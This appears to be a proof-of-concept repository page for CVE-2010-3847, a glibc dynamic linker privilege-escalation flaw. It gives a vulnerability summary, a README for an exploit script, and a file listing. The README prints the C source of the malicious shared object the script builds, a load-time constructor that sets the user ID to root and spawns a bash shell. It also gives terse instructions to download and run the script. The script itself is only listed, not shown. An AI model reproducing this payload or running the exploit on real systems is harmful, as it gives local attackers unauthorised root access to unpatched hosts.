
CVE-2010-3847 PoC — GNU C Library Dynamic Linker Vulnerability

Source
Associated Vulnerability
Title: GNU C Library Dynamic Linker Vulnerability (CVE-2010-3847)
Description: GNU C Library (glibc, libc6) is a free, open-source C language program released under the LGPL license. GNU C Library 2.11.2 and earlier versions contain a dynamic linker vulnerability caused by incorrect handling of the $ORIGIN value in the LD_AUDIT environment variable. A local user can gain privileges by means of a specially crafted dynamic shared object (DSO) located in an arbitrary directory.
Description
Script to take advantage of CVE-2010-3847
Readme
CVE-2010-3847 script
====================
Meant to automate the exploit discussed in
[http://marc.info/?l=full-disclosure&m=128776663124692&w=2].  Tested on
CentOS 5 x86.

The DSO it outputs is compiled from the following code:
```c
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

/* Constructor: runs automatically when the dynamic linker loads this DSO,
 * before main() of the host process, so no call from the host is needed. */
void __attribute__((constructor)) init(void)
{
   setuid(0);
   system("/bin/bash");
}
```

Usage
-----
Download it, put it somewhere executable, and run it.

Gotchas
-------
`/tmp` and wherever `ping` is have to be on the same filesystem.  If not,
adjust the paths accordingly.
File Snapshot

```
[4.0K] /data/pocs/6d1bc6840dcfa35f71366549bee1028f67aa34c5
├── [ 23K] CVE-2010-3847.sh
├── [ 858] LICENSE
└── [ 571] README.md

0 directories, 3 files
```